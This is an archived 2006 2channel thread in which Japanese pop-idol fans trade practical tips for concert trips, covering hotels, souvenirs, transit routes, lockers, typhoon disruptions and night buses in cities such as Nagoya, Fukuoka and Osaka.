2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【・∀・イイ】遠征お役立ち情報【 ゚Д゚ゴルァ】5泊目

1 :どちらのヲタさんもマターリ:2006/09/04(月) 21:14:45 ID:7+t9XgCQ
遠征時に使用する交通機関・ホテル・食い物屋
(・∀・)イイ!情報も、( ゚Д゚)ゴルァ情報も入り乱れ
次回、遠征に役立て(゚д゚)ウマー

*お約束*
◎宣伝行為はヽ(*`Д´)ノゴルァ
◎前スレ群も一通り目を通しましょう。
◎自分でも目の前の賢い箱で調べてみましょう。


*前スレ*
【・∀・イイ】遠征お役立ち情報【 ゚Д゚ゴルァ】4泊目
http://tv8.2ch.net/test/read.cgi/jan/1104329264/l50
【・∀・イイ】遠征お役立ち情報【 ゚Д゚ゴルァ】3泊目
http://tv6.2ch.net/test/read.cgi/jan/1083317422/l50
【・∀・イイ】遠征お役立ち情報【 ゚Д゚ゴルァ】2泊目
http://tv4.2ch.net/test/read.cgi/jan/1069808342/l50
【(・∀・)イイ!】遠征お役立ち情報【( ゚Д゚)ゴルァ】
http://tv2.2ch.net/test/read.cgi/jan/1038054366/l50

2 :ななしじゃにー:2006/09/04(月) 21:28:36 ID:3d4/JyOQ
2ゲト

3 :ななしじゃにー:2006/09/04(月) 22:05:47 ID:NLIfW1S9
>1
トンです!

4 :ななしじゃにー:2006/09/04(月) 22:35:54 ID:sPgMIbc4
>1
dd!嬉しい(つд`)

5 :ななしじゃにー:2006/09/05(火) 00:20:26 ID:ue/WuoUi
>1
乙!復活してヨカタ。

6 :ななしじゃにー:2006/09/05(火) 01:39:27 ID:K9snMOof
>1
乙鰈。

これから遠征が始まる姐サン方、情報よろしくお願いしまつ。

7 :ななしじゃにー:2006/09/05(火) 11:49:18 ID:RDsym6vF
>1
乙&d!
毎日スレ盾挑戦してたんだけどずっと蹴られてたんだよ

8 :ななしじゃにー:2006/09/05(火) 23:53:46 ID:JKc1WQ0u


9 :ななしじゃにー:2006/09/06(水) 20:18:44 ID:Z6+s37um
これ沢尻の投稿です

815 :名無しさんは見た!@放送中は実況板で :2006/09/06(水) 19:11:06 ID:kzXd2jR5
若手の歌手なんかがエリカの裏で動いてる力にかなうわけなじゃん!
トップは確実だな!
どんな手使っても売れたもんが勝ちなんだよ!
これで世間のエリカに対する評価はウナギ登り!
ざまみろ糞アンチ(^O^)

10 :ななしじゃにー:2006/09/07(木) 12:21:39 ID:htV0Crcp
来週鯱に行くんだが、今さらながらウマイお土産ってなんだろう?
いつもお世話になっている友に、送りたい。
ういろうしか思い浮かばないんだが、友はういろうは苦手だと言っていたので。

11 :ななしじゃにー:2006/09/07(木) 12:30:22 ID:0EVYftyw
予算は?

12 :10:2006/09/07(木) 13:44:44 ID:HJX+/XXT
予算書き忘れてたスマソ
だいたい1〜2千円弱位で。
あんまり仰々しいと季節はずれなお中元になっちゃうのでw

13 :ななしじゃにー:2006/09/07(木) 14:30:52 ID:HoV4LEHB
コーチンプリン

14 :ななしじゃにー:2006/09/07(木) 15:12:08 ID:oPJZhTvx
土産屋に売ってるようなプリンはイマイチ…

麺類はいかが?半生きしめんなら多少日持ちもするし。
ザル用、温かいもの用と売っていますよ。
あとはゆかり(海老煎餅)もおいしいし、苦手な人は少ないと思う。

15 :ななしじゃにー:2006/09/07(木) 15:33:24 ID:cwZHu1hR
他県民の海老嫌いですが、坂角総本舗のゆかり好きです。
「さくさく日記」てのがゆかりを小さくした感じでお手ごろだし
お土産候補に良いかも。

16 :ななしじゃにー:2006/09/07(木) 16:27:02 ID:eDt2jKAK
皆は遠征時、何円
ぐらいのホテルに宿泊
してるんだろう

17 :ななしじゃにー:2006/09/07(木) 19:17:40 ID:htV0Crcp
10です。
姐さん方、レスサンクスでした。
坂角のゆかり忘れてました。
あれなら喜ばれそう。ありがとうございました。

18 :ななしじゃにー:2006/09/07(木) 23:46:03 ID:nJCTGr4J
>16
普段はJRや飛行機とのパックになった商品を使ってるからお得だけど、
ホテルの定価?で計算すれば8千円〜1万2千円くらい。
こないだはパックが使えなかったので○ゃらん使ったら、
きれいなビジホに5千円で泊まれたよ。

19 :ななしじゃにー:2006/09/08(金) 01:06:53 ID:IyzaEe4m
>>18さんありがとですw
漫画喫茶?とかで
泊まってるヲタもいると
聞いたんですが…

20 :ななしじゃにー:2006/09/08(金) 08:13:32 ID:tRlsKJB4
>19
>◎前スレ群も一通り目を通しましょう。

21 :ななしじゃにー:2006/09/08(金) 09:45:35 ID:bpsntc3P
お金

22 :ななしじゃにー:2006/09/08(金) 18:04:33 ID:9dhjcA0U
漏れは一泊3千円のホテルに一人で3泊する予定



23 :ななしじゃにー:2006/09/08(金) 20:44:41 ID:NaSEdXrH
地方は安いよね。シングル4000〜5000円で朝食付きの小奇麗なホテルに泊まれる。
帝都なら7000円〜10000円くらい。
探せば、時期によるけど一流ホテルの特別プランツイン1万なんていうのもある。
なかなかリッチな気分になってイイ!

24 :ななしじゃにー:2006/09/08(金) 21:23:21 ID:SbNM533V
>22
おまいが無事に帰還できるのを祈るよ。
自分なら安すぎは恐くて泊まれない。

25 :ななしじゃにー:2006/09/08(金) 21:59:43 ID:IyzaEe4m
>20過去スレ群
みれないんです

26 :ななしじゃにー:2006/09/09(土) 00:59:55 ID:1p249zKX
>22>24
3千円たまにあるぜ!自分ときは全然大丈夫だったぜ。
海外の安ホテルに比べりゃ、日本なんて綺麗綺麗。

27 :ななしじゃにー:2006/09/09(土) 11:22:56 ID:Nct7Qvhz
自分は帝都はスパに泊まってる。
中は綺麗だし、いつも行くところは結構な穴場みたいで
深夜inしても必ずマットレス空いててぐっすり寝られる。駅も目の前で便利。
割券orクーポン使うと宿泊2500円位だし、何よりホテルより安い。
でもこんなに安くて快適なのに何故かお仲間ゼロ。ヲタはスパは使わないのか脳。

自分は宿代ケチった分何公演と続けて見る方だけど
1公演のみの遠征となるとホテルでのんびりする方がいいよな。

28 :ななしじゃにー:2006/09/09(土) 22:31:42 ID:rPNwTu+m
>22
自分は一人2,500円のところに泊まった。
朝食付きの所は3,500円だった。
何事もなく無事に帰還できたYO

29 :ななしじゃにー:2006/09/10(日) 21:13:01 ID:D5/2WNO1
泊まるホテルって、その時の気分で全然違うからなー。
1日2回公演で夜も宿泊だったら、間でホテルに戻って休みたいから
多少高くても会場から徒歩圏内に泊まったりするし、
5連泊くらいになるときは、安いトコだったりするし。
5千円〜2万5千円くらい幅がある。

30 :ななしじゃにー:2006/09/10(日) 23:35:25 ID:a8SME3Bs
名古屋駅から矢場町まで地下鉄で行く時
栄乗換は駅が混雑するから、桜通線で久屋大通で乗換えた方が良いと
以前聞いたのだが、今でもそうだろうか?

31 :ななしじゃにー:2006/09/10(日) 23:46:55 ID:wUe/u2Kk
混雑するっちゃするけどそんな迷うほどじゃないと思う
桜通線あんま乗らないけど待ち時間がちょっとあるし
心配なら金山から名城線で行けばイイ!

32 :ななしじゃにー:2006/09/10(日) 23:55:49 ID:BfbrkLPo
久屋大通の乗り換えはホームが少し離れてて面倒だったような・・・。
東山線の方が本数多いし混んでても栄で乗り換えた方が楽だと思う。

33 :ななしじゃにー:2006/09/10(日) 23:59:45 ID:7UU/E4b+
自分も栄乗り換えでいいと思う
混雑も日によるかもだがそれほどではない
敢えて言えば東山線はなるだけ前の車両に乗った方がいいかな

34 :30:2006/09/11(月) 00:42:13 ID:eQBLAlRm
東山線の前の方に乗ることにします。
姐さん方、dです。

35 :ななしじゃにー:2006/09/11(月) 17:02:36 ID:wUgwQeS5
福岡のマリンメッセ近辺にコインロッカーってあります?
会場にもあるみたいだけど数的に無理がありそう…
その前に使えるんでしょうか?

36 :ななしじゃにー:2006/09/11(月) 17:38:46 ID:owxLy9I5
>27
自分はスパで病気もらって以来怖くて使えない。
疲れて体力落ちてる時は免疫も落ちてるから危険だと
身をもって知ったので今は5000円以下のキレイだけど安いビジホ使ってる。
自分的にはビジホの大浴場の方が疲れが取れるし個室で快適かな。

37 :ななしじゃにー:2006/09/11(月) 18:10:39 ID:GqL5QM7T
病気ってどんな病気…?(ガクブル
つか、大浴場は大丈夫なのか?

38 :ななしじゃにー:2006/09/11(月) 19:56:20 ID:m4qbOOgF
豚切でスマソ。
名古屋で昼間時間をつぶせる観光スポットみたいなところある?
夜公演2回見に行くから、昼の時間が余ってるんだけど。

39 :ななしじゃにー:2006/09/11(月) 21:04:31 ID:AsFv1b8B
>35
会場のロッカーって以外と穴場だけど、マリンメッセは数少ないのかな?
城Hなら100%の確率で入れられるんだけど。
博多駅のロッカーはお昼にはいっぱいになってしまうので、
駅に入れるなら朝9時くらいまでに入れるのがオススメ。
でも駅のは入れ替わりが激しいんで、ちょっと待ってればどこかが空くけどね。

40 :ななしじゃにー:2006/09/11(月) 23:31:04 ID:QBVJ7zXE
>38
どういう訳か『一人でコンサート行きますか?』スレで
鯱話が盛り上がってるよ


41 :35:2006/09/12(火) 01:15:19 ID:pyocgWYv
>39
dです。今回初めて会場近くにホテルを取ったので
駅を使わないもので他にどこかないかな、と。
とりあえずコンパクトにしつつ会場のが使えることを期待します。

42 :ななしじゃにー:2006/09/12(火) 10:00:14 ID:dj1AzZ+3
>37
マジレスすると世紀ヘルペス。
当時生娘だったからおかしいとは思ってたけど心当たりもなくて、
気にせずに放置してたらどんどんひどくなって結局入院した(w
大浴場も怖いと言えば怖いけど、ビジホは最初から泊まるために
来る人しかいないから「お仕事後」の人がいない分、リスクは少ない。
それに何よりも自分の体力をしっかり回復できるから大丈夫だし、
ヘルペス持ちなら症状出てる時期(=他の人に感染させる力がある時期)は
部屋のユニット使うだろうからまず問題ないかと。

43 :ななしじゃにー:2006/09/12(火) 10:17:24 ID:zlFTRbph
>38
名古屋港水族館、名古屋城、東山動物園、栄や名駅でデパート巡り くらい?

44 :ななしじゃにー:2006/09/12(火) 10:54:07 ID:GuoSO89A
>41
会場近くにホテル取ったならホテルに預ければいい。
なんでわざわざコインロッカーを探すの?

45 :ななしじゃにー:2006/09/12(火) 11:35:42 ID:Z5u4cwwA
>43
d
ちなみに水族館と動物園ならどちらがお勧め?
東山動物園はコアラがいるんだよね。
水族館は近頃の流行のようなトンネルとかあったりするところなのかな?

>40
アリマト。そっちも覗いてみるね。


46 :ななしじゃにー:2006/09/12(火) 12:42:01 ID:zlFTRbph
>45
雨だったら水族館のほうがいいんじゃない?
動物園はもう何年も行ってないから最近の様子はわからないけどコアラはいると思う。植物園もある。
水族館はシャチがいてイルカがいっぱいいた。イルカショーとかある。
水中トンネルはあったような気がする。
気になるようならサイト見てみるのもいいかも。

47 :ななしじゃにー:2006/09/12(火) 14:03:44 ID:Z5u4cwwA
>>46
詳しくd。
そっか、雨の動物園はちと大変そうだな。
水族館の方が高いけど面白そうだね。
サイト見たんだけれど、詳しいことが載ってなくて情報ありがたい。


48 :ななしじゃにー:2006/09/12(火) 14:36:14 ID:6km3LR2S
>44
帰りの日のコト。

49 :ななしじゃにー:2006/09/12(火) 16:10:07 ID:S9p4PM2d
チェックアウトした後も荷物は預けて
帰りに寄って帰れば良いじゃん。

50 :35:2006/09/12(火) 23:50:16 ID:pyocgWYv
色々dです。
44さんの言うとおり、帰り日の話です。
紺終了後はそのまま空港に直行で、ホテルがその道中ではないので
なるべく時間のロスがなくなるように会場近辺にないかなと思ったんです。

51 :ななしじゃにー:2006/09/13(水) 00:05:41 ID:a5ZmERkp
栄にジャニショもあるよ

52 :ななしじゃにー:2006/09/13(水) 01:01:26 ID:TPVWp6ex
>50
タク待ちの時間は考慮済み?
付近のホテルなら戻ってもタク待ち時間と大差ないと思う。
よほど時間がないなら朝のうちに空港に行って
チェックインして先に手荷物だけ預けちゃうのも手。
福岡は空港近いからちょっと早起きすれば余裕だよ。

53 :ななしじゃにー:2006/09/15(金) 17:01:25 ID:tdSYp/uR
福岡台風上陸のおそれありとの事で
行かれる姐サン方お気を付けて。

54 :ななしじゃにー:2006/09/15(金) 22:42:10 ID:cGXTvhJq
たこやきから遠征します
帝都は寒いですか?

55 :ななしじゃにー:2006/09/15(金) 23:38:04 ID:QRDm5jQ7
ノシ 帝都は急に寒くなったぞ。要ジャケ・パーカーなくらいだ。

ジヌンは明後日のめんたい行きが心配過ぎる。サンサンめ・・・

56 :ななしじゃにー:2006/09/15(金) 23:41:31 ID:Ce3HTE40
台風で公演中止ってあるんだろうか。

57 :ななしじゃにー:2006/09/15(金) 23:45:42 ID:6/xuWqVy
この連休、昼間はムシムシする事もあると思うが
朝晩はかなり冷え込むので薄手の長袖かジャケ等調節できる格好がイイ。

自分も明太行けるか不安だ。一旦広島辺りにでも飛ぶかな・・・

58 :ななしじゃにー:2006/09/16(土) 00:00:02 ID:w012scZw
自分も明後日めんたい入り。お願いだから飛行機飛んでくれorz

59 :ななしじゃにー:2006/09/16(土) 00:08:02 ID:hfKtngCH
自分は18日めんたい参加のもみまん人
水曜から予想進路と速度を見てハラハラしっ放し…

60 :ななしじゃにー:2006/09/16(土) 01:13:55 ID:05Ck+FRz
>56
昔髪紺たこやきが台風で中止になったような…。
帝都武威紺は台風で別日に振替になったことも。

61 :ななしじゃにー:2006/09/16(土) 22:34:27 ID:MBjZFv6+
今年も『鉄道の日記念 乗り放題きっぷ』全国版とJR西日本版の発売ケテーイ!

鈍行で遠征してくるノシ

62 :ななしじゃにー:2006/09/17(日) 13:59:51 ID:TaChcQkn
今日のマリンメッセ延期になったね。

63 :ななしじゃにー:2006/09/17(日) 16:51:15 ID:XcalMI7G
>62
10月3日18:30〜の振替公演になったね

今めんたいに居る姐サンと明日めんたいに向かう姐サン気をつけてねノシ

64 :ななしじゃにー:2006/09/17(日) 18:58:05 ID:XcalMI7G
もみまん市内電車が止まってるの忘れてた orz

中心部のネットカフェに行けるかどうか分からないけど
チャイガーデンにはシャワー室あるよ
店の近くの人が帰るだろうから、禁煙&喫煙の個室とも空きが増えそうだって


65 :ななしじゃにー:2006/09/17(日) 19:01:16 ID:XcalMI7G
連投スマソ
もみまんのネットカフェは大抵の店で御新規さんは入会時に身分証明が必要

姐サンの健闘を祈るよノシ

66 :ななしじゃにー:2006/09/17(日) 19:11:36 ID:AwIvtfZ4
広島到着姐さん、大丈夫か?スレageなくてもいい?
知らない土地で携帯片手に困ってるのかなと考えてしまう。余計なお世話か。

67 :ななしじゃにー:2006/09/17(日) 19:32:39 ID:ldthZJlM
福岡で一人hotelに缶詰めの人はlobbyに集合してみたら。

68 :ななしじゃにー:2006/09/17(日) 19:37:09 ID:zmw6YLd3
もみまん地元人で明日のめんたいコンに参加予定だったのだが足止めくらった負け組…orz
明日の朝果たして博多まで高速バスやらJRやらが動くのかも心配なんだが…。
台風情報を目に焼き付けつつダッス見てる…。

69 :ななしじゃにー:2006/09/17(日) 19:43:05 ID:ikASMMnp
東京などから来ている姐さん方
こっちの台風はありえないようなものが吹っ飛んでくるので
ホテルから外には出ないようにな。

70 :ななしじゃにー:2006/09/17(日) 19:48:30 ID:UqZF+T3o
>68
ナカ-マ。自分は明日の夜公演参加するよ!
10時半発のバス抑えてるけど、どの手段で行くかは各所HPや電話で判断になるね

71 :ななしじゃにー:2006/09/17(日) 21:19:12 ID:Oi0mo7LQ
めんたい台風抜けたみたい
明日参戦の姐さん方気をつけて。
自分は昼参戦だが友が大分で足止めくらってて心配だよ

72 :ななしじゃにー:2006/09/17(日) 23:20:59 ID:lec55AnU
ここは共通スレだから光一担のめんたい気象情報は紺スレでやって欲しい。
てか、紺の日の気象情報や交通情報は
今までそれぞれ紺スレでやってたと思うんだけど。

73 :ななしじゃにー:2006/09/18(月) 07:43:18 ID:1jbQ2E0Y
新宿近辺、身分証明書なくても入れるネットカフェある?

74 :ななしじゃにー:2006/09/18(月) 16:36:30 ID:6DnaLBLh
鯖江にはコインロッカーありますか?

75 :ななしじゃにー:2006/09/18(月) 16:39:48 ID:UuOV7SHj
仙台姐さんアドバイス願います。
利府駅って1時間に1本とかなんだけど、コン時には臨時とか出ます?
出ないなら仙台から直行バスの方がいいですよね?

76 :ななしじゃにー:2006/09/18(月) 23:08:15 ID:sws9k6JX
鯖江って、駅からは皆徒歩?
臨時バスとかは出ないんですか?

77 :ななしじゃにー:2006/09/19(火) 01:06:47 ID:vE948rqG
>76
臨時が出るほどの距離じゃない。
タクってもワンメターだ。4人で乗ればバスより安い。


78 :ななしじゃにー:2006/09/19(火) 18:54:04 ID:j/+cHWue
>76
暑い中、2km弱を歩くのはしんどかったよ

79 :ななしじゃにー:2006/09/19(火) 19:34:51 ID:P/LNYKho
私も75と同じ質問をしようとしていた。
てか仙台から直行のバスってあるんですか?

80 :ななしじゃにー:2006/09/19(火) 20:52:17 ID:YQ9Ol1cY
>79
プロモーターHPに臨時直行バスの詳細出てる。
自分も遠征者だけど帰りの日は直行バスにしようと思ってる。
会場〜利府駅までが渋滞で時間かかる場合もあるらしいので。

81 :79:2006/09/19(火) 22:40:05 ID:P/LNYKho
>80
サンクス
一時間一本の電車事情で、紺やるには辛すぎ・・・

82 :ななしじゃにー:2006/09/19(火) 23:28:56 ID:8dS43UkQ
だったらそんなとこまで行かなければイイ(・∀・)!!
紺やってくれるだけ裏山な担もいるんだぞ、と。


83 :ななしじゃにー:2006/09/19(火) 23:51:46 ID:oDIjnZ7e
鯖江駅って紺終了時はかなり混雑しますか?
時間に駅についてても、改札通れず電車に乗れないなんてことあるでしょうか?

84 :ななしじゃにー:2006/09/20(水) 00:43:05 ID:tmglELvQ
初ひとり遠征で、たこやき城Hに行く予定。
帰りの新幹線予約しないといけないんだが、終演予定の一時間後
新大阪発で余裕でしょうか?

85 :ななしじゃにー:2006/09/20(水) 01:14:58 ID:2ocNcgAx
>83
田舎の狭い駅だから多分ヲタでごったがえし状態
でも自動改札じゃないから
電車に乗れないなんてことはないと思う
気をつけてお越し下さい

>76
真夏の某G紺の時は2km弱歩くのは大変だったと思うが
今の季節だったらそれほど苦ではない
ゾロゾロとみんな歩いているからガンガレ


86 :83:2006/09/20(水) 01:23:10 ID:3duLajgO
>85
d!
地元姐さんかな? 今週末はお騒がせします。
早めに行くに越したことはなさそうですね。駅まで走るぞ!

87 :ななしじゃにー:2006/09/20(水) 03:46:23 ID:RmLaRiaB
>84
時刻表上では余裕だね

所要時間のレスでなくて申し訳ないんだが…
姐サンがJR西日本管内に住んでるならe5489plusはどうだろう?
(最初は)指定席のみだけど、乗り遅れそうになったら
発券前は携帯から時刻表出発時間の6分前まで便を変更できるし
発券後も1回なら同日同路線を窓口で変更できるよ

めんたい遠征の帰りは、のぞみ最終を予約していたんだけど
駅に早く着いたから2本前のひかりに変更したよ
流石に(窓側の)指定席は満席だったので自由席になったけど
1本前のひかりが出発したばかりだったから自由席を待っている列の
先頭付近に並ぶことが出来て希望通り窓側に座って帰ったよ

長文スマソ



88 :ななしじゃにー:2006/09/20(水) 20:03:37 ID:tmglELvQ
>87
トン!
せっかく情報をいただいたんだが、関東住みです。
他の姐さんには非常に参考になるね。

確かに時刻表上では余裕なんだけど、会場によっては終演から駅に
辿り着くまで30分位かかったりするんで、その辺どんなもんかと
思った次第でした。

89 :ななしじゃにー:2006/09/20(水) 20:12:23 ID:WMfj+6rV
住み・・・?

90 :ななしじゃにー:2006/09/20(水) 21:32:58 ID:/ciVdZ7L
>88
余裕あるともいいきれないよ。
終演したら早めに荷物はまとめておいて、すぐに出ること。
(但し規制退場があれば従う)
人込みに入ってしまうと、なかなか動けないからね。
帰りの切符が新幹線の往復に入ってなければ買っておくこと。
あわてて帰りたくなければ、近くのニューオータニ付近にタクシーがあるから乗れば余裕。2400円程度かな。

91 :ななしじゃにー:2006/09/21(木) 00:52:23 ID:X3Tv25A+
福井、一人で車とばして参加することにした。
駐車場は早めに行かなければ止めれないかな?
わかる姐さんいたらスマソだか教えてくだされ。

92 :ななしじゃにー:2006/09/21(木) 09:33:07 ID:H4sP1pIh
漏れも帝都から車で行くことにした。駐車場200だか300台位しか入れないみたいだが嵐の時はどうだった?明日の夜出るか土曜日朝出るか…悩み中。

93 :ななしじゃにー:2006/09/21(木) 11:36:09 ID:4jDoGuuU
>75
今さらだが利府発仙台行きの臨時列車は出るよ。
ただし開演時間によっては臨時だと新幹線に接続出来ないこともある。
紺の後の時間だと臨時抜きで1時間に2本くらいはあったはず。

94 :ななしじゃにー:2006/09/21(木) 23:19:12 ID:CHTyYems
サンドームの駐車場はかなり広いから大丈夫!
駐車場で棒?持ったおじさんが誘導しているから
そのおじさんに従えば問題なし。
姐さん方、気をつけていらっしゃいませ。
ちなみに夏の嵐紺の時、地元以外で
石川富山中京関西方面の車も沢山あった


95 :ななしじゃにー:2006/09/21(木) 23:43:23 ID:H4sP1pIh
d!観光も兼ねて明日の夜出発になりました。参考にさせていただきます。

96 :ななしじゃにー:2006/09/22(金) 00:35:56 ID:TH2/5+mz
>94d!91です。
愛藻からなんでアンカつけれずスマソ。
街中をどこのや?と聞きたくなるナンバ-の車が走りますwお世話になります。

>92
お互い長時間ドライブ頑張りましょ。

97 :ななしじゃにー:2006/09/22(金) 21:24:57 ID:6J/jrQbd
今から福井に向かって出発します。
>>96
お互い無事故で終えられることを願い今から出発!

98 :ななしじゃにー:2006/09/23(土) 05:47:56 ID:Zq3tffRt
サンドーム行く姐さん方周辺に何もないから飲み物は駅で絶対買っといた
方がいいよ。

99 :ななしじゃにー:2006/09/25(月) 03:37:31 ID:BNd4pE7k
夜バスで遠征しようと思うのですがエコノミー症候群が気になります
車内を歩き回る訳にもいかないし…
こまめな水分補給と脚を動かす以外に何かオススメはありますか?
わざわざ加圧靴下をはく姐サンはおられるんでしょうか?

100 :ななしじゃにー:2006/09/25(月) 10:52:17 ID:rE3BTIkU
>99
これまでに何度も夜バスは使っているが気にしたことはない。
気になるならやれるだけのことをすれば良いと思うし、
それでも気になるなら夜バスを使わなければ良いと思われ。
金銭面や時間の都合はあるだろうが移動手段は夜バスだけではない。

101 :ななしじゃにー:2006/09/25(月) 15:17:46 ID:fj54VKUM
>99
首マクラ必須。
あとは慣れ。人によりけりだろうけど心配するほど辛くないよ。
車中は靴脱いだ方が楽だからブーツよりは着脱容易なサンダルとかが(・∀・)イイ!!

102 :ななしじゃにー:2006/09/25(月) 18:26:32 ID:D5SPGVnH
>>99
移動距離にもよると思うけど、なるべく席のゆったりしたバスを選んでみては?。
名古屋‐東京で\6,000強の女性専用バスは足置きもあって、かなり快適だったよ。
ブランケットも付いてたし確か履き替え用の簡易スリッパも貰えたような。
多少割高だけど、それでも新幹線よりは安く移動できる。


103 :ななしじゃにー:2006/09/25(月) 22:13:19 ID:PxSBy9Ws
>99
JRの3列バスは快適だよ
後は休憩の度に、降りてみては?

104 :ななしじゃにー:2006/09/25(月) 23:12:56 ID:3tSX/gkE
激安便は違うかも試練が、夜バスって国際便のエコノミーより大分楽だよね。
女性なら動けないことより寒さが気になるんジャマイカ。

105 :ななしじゃにー:2006/09/26(火) 00:31:44 ID:KocV3+4r
夜バスでエコノミークラス症候群なんて初めて聞いた。
あるんだ?

106 :ななしじゃにー:2006/09/26(火) 03:01:03 ID:zjl1go1Z
>100-104
d! 初めての夜バスなので色々参考になりますた
地方の中距離路線なので競合はなく、車内設備の確認は済ませてあったので
足りないモノを持参し、動いて良い時にシッカリ動くことにします
特に首マクラ…完全に忘れてた orz >101姐サンありがd!

>105
ない。とは言えない程度?
乗車してすぐアルコール摂取して到着まで微動だにせず爆睡…は危険度高いみたい
あとは、ゆったりめの服がオススメ…って飛行機と変わらないか

107 :ななしじゃにー:2006/09/26(火) 23:31:25 ID:AB+SAv3p
>160
バスにしても飛行機にしても一体どのくらいの頻度であるわけ?
自分も結構長距離飛行で旅行してるし友人知人、会社の人々なんか
数え切れないほど乗ってるけどいまだに聞いたことないけど。
テレビとかに煽られすぎなんじゃないの?

108 :ななしじゃにー:2006/09/27(水) 00:24:01 ID:GXcGMIL3
万が一、ってこともある罠。

109 :お約束:2006/09/27(水) 00:26:49 ID:6UJHla0H
160はテレビとかに煽られ過ぎなレスをすること。

110 :ななしじゃにー:2006/09/27(水) 06:52:39 ID:lN6PO/Bb
>107
頻度を知りたいなら目の前の賢い箱で(ry

>109
テラワロスw
しかし、えらいプレッシャーなんだが…
dkdkしながらROMるよ

111 :ななしじゃにー:2006/10/03(火) 20:48:03 ID:Vcl0xl+s
大阪城ホール前のまずいたこやきを、2年ぶりに食ってくるか。

112 :ななしじゃにー:2006/10/03(火) 23:22:06 ID:2m4pY3pi
お役立ちあげ

113 :ななしじゃにー:2006/10/04(水) 03:43:18 ID:p4nVq36q
エコノミー症候群バスでもなるよ。特にピル飲んでる人や太ってる人なんかは要注意

114 :ななしじゃにー:2006/10/04(水) 13:54:24 ID:CcrDH07h
SAに着くたび降りてストレッチなどしてればエコノミークラス症候郡はあんまり心配ナスだとオモ-
ジヌン名古屋東京間をしょっちゅうするがなったことない
個人差あるから過信はイクナイが脳
楽しい旅をノシ

115 :ななしじゃにー:2006/10/05(木) 00:28:25 ID:HuID5v/V
>114
1行目は同意なんだけど、
名古屋東京間はエコノミー症候群を心配するほど時間かからないんじゃ。

116 :ななしじゃにー:2006/10/05(木) 00:53:13 ID:jZboRzAU
地元→帝都間はSAで下ろしてくれない…(´・ω・`)

117 :ななしじゃにー:2006/10/05(木) 14:30:21 ID:6zfnZPRO
タコ焼き国の温度はどうですか?
服装の
おすすめは?

118 :ななしじゃにー:2006/10/05(木) 17:18:45 ID:5Ybnaybx
昼間は半袖もしくは、薄手の長袖で快適。
しかし朝夕は肌寒い。
なので、カーデとかジャケットは必須かな。


119 :ななしじゃにー:2006/10/05(木) 19:31:02 ID:z/WRvQXG
携帯からスマソ
たこやきは確かに薄手長袖でも、外なら大丈夫だけど、店の中だとやたら寒かったりしないか?
いや、自分が寒がりってのもあるかも試練が…。
会場近くの店はやたらクーラー効かせてたりします。

120 :ななしじゃにー:2006/10/05(木) 20:15:14 ID:dOM2T9NV
タコヤキは半袖+ジャケットでOKだよ。
ジブンはワンピ+ジャケットで明後日、参戦。

121 :ななしじゃにー:2006/10/05(木) 21:52:18 ID:xN+BVmJG
たこやきに7日行ける事になったのだけど、検索したら宿が空いてないorz
行った事無いけどカプセルって女性でも大丈夫?
最悪ネットカフェで1夜明かすかな…。

122 :ななしじゃにー:2006/10/05(木) 23:13:17 ID:w66CO8vt
直接ホテルに電話してきいてみたら意外ととれることあるから
カプセルの前に何件か試してみては?
ネット枠と普通予約枠って分けられてるからがんばれ。

123 :ななしじゃにー:2006/10/05(木) 23:16:58 ID:VqUc3FQa
>121
女性専用か男女別れてるとこ探しなよ。サウナとか。
ネカフェは数十分の仮眠や、起きてるのならいいけど
しっかり睡眠予定なら、おすすめ出来ない。

124 :ななしじゃにー:2006/10/05(木) 23:38:59 ID:xN+BVmJG
ありがとう。
出来れば眠りたいから、直前予約のとことか直接電話とか、
やれるだけ頑張ってみる。

125 :ななしじゃにー:2006/10/05(木) 23:39:38 ID:Dh1qzzF3
たこやきでホテルが空いてないなんてありえないんだがw
一体、いくらで泊まろうと思ってるのか・・・

126 :ななしじゃにー:2006/10/05(木) 23:59:11 ID:Xn7qo038
>125
121じゃないが、ネットで検索しても確かに満室だ。
神戸も京都もダメ。3万円台の高級ホテルなら空いてるところもあったが。

127 :ななしじゃにー:2006/10/06(金) 00:03:07 ID:WQSo5EqT
まあ連休初日だしね。

128 :ななしじゃにー:2006/10/06(金) 00:17:11 ID:blDWddNU
連休でも多少は空いてると思うけどなぁ。
なんか大きな行事かイベントでもあるんじゃないの?
何年か前に10万人紺とぶつかって宿取るのに困ったことあったよ。

129 :ななしじゃにー:2006/10/06(金) 00:39:06 ID:rpgAWH9X
旅窓で検索してみ。
地下鉄で乗り換え有るけど、市内のホテル空いてる。

130 :ななしじゃにー:2006/10/06(金) 01:00:35 ID:rshgBmuA
ホテルに泊まれれば一番、良いんだけど女性専用のカプセルやスパは大阪にもあるからガンバレ。

131 :ななしじゃにー:2006/10/06(金) 09:56:05 ID:a3Arxu3i
大阪駅(梅田)周辺に『トウチュウ』及び『チュウスポ』売ってるお店ありますか?

132 :ななしじゃにー:2006/10/06(金) 10:39:20 ID:MjQI1zn2
今外にいるんで、コンビニとか見てみたけどトウチュウ・トウスポ共に姿形すら見られなかった。
てか自分たこやき在住だが、いまだかつて売ってるの見た事茄子。
昔はキタの中日新聞社の玄関に、自販機置いて売ってたらすぃが…。

133 :ななしじゃにー:2006/10/06(金) 12:10:36 ID:a3Arxu3i
>132
そこにあるみたいですよ。
でも結局トウチュウに電話して今日と明日の分まとめて取り寄せにしました。

134 :ななしじゃにー:2006/10/06(金) 12:25:50 ID:MjQI1zn2
>133姐さん
ありがとうございます。
また行って見て来ます。

135 :ななしじゃにー:2006/10/06(金) 17:29:14 ID:0QrzuyLm
何があるの?>トーチュー

136 :ななしじゃにー:2006/10/06(金) 20:34:28 ID:6TVHGJ1m
たこやき、晴れてれば半そででもいいぐらい。
城ホールのトイレはこむが、入るまえに水上バスのトイレなら無人。
川ぞいにある。

137 :ななしじゃにー:2006/10/06(金) 23:02:03 ID:GwS7jv7z
神戸が国体中でホテルとれないからいつもよりたこやきに宿泊客が流れてるよ

138 :ななしじゃにー:2006/10/07(土) 20:11:13 ID:Xu36lj7j
明日のタコヤキは御堂筋パレードあるから、かなりの人手だと思う。

139 :121:2006/10/08(日) 23:35:54 ID:bk5xvPrc
直接電話かけまくって10件目位で空き見つかって、
無事たこやき市内にホテル泊出来、美味しいものも食べて帰還しました。
兵庫国体やパレード、甲子園の阪神巨人戦など色々イベントが重なった様で、
6日、8日は余裕なのに7日だけは何処も満室。
大阪駅の案内所にも本日宿泊満室の紙が貼ってありました。
レスくれた姐さん方、ほんとにありがとうでした。


140 :ななしじゃにー:2006/10/09(月) 15:47:27 ID:RZR7gsqx
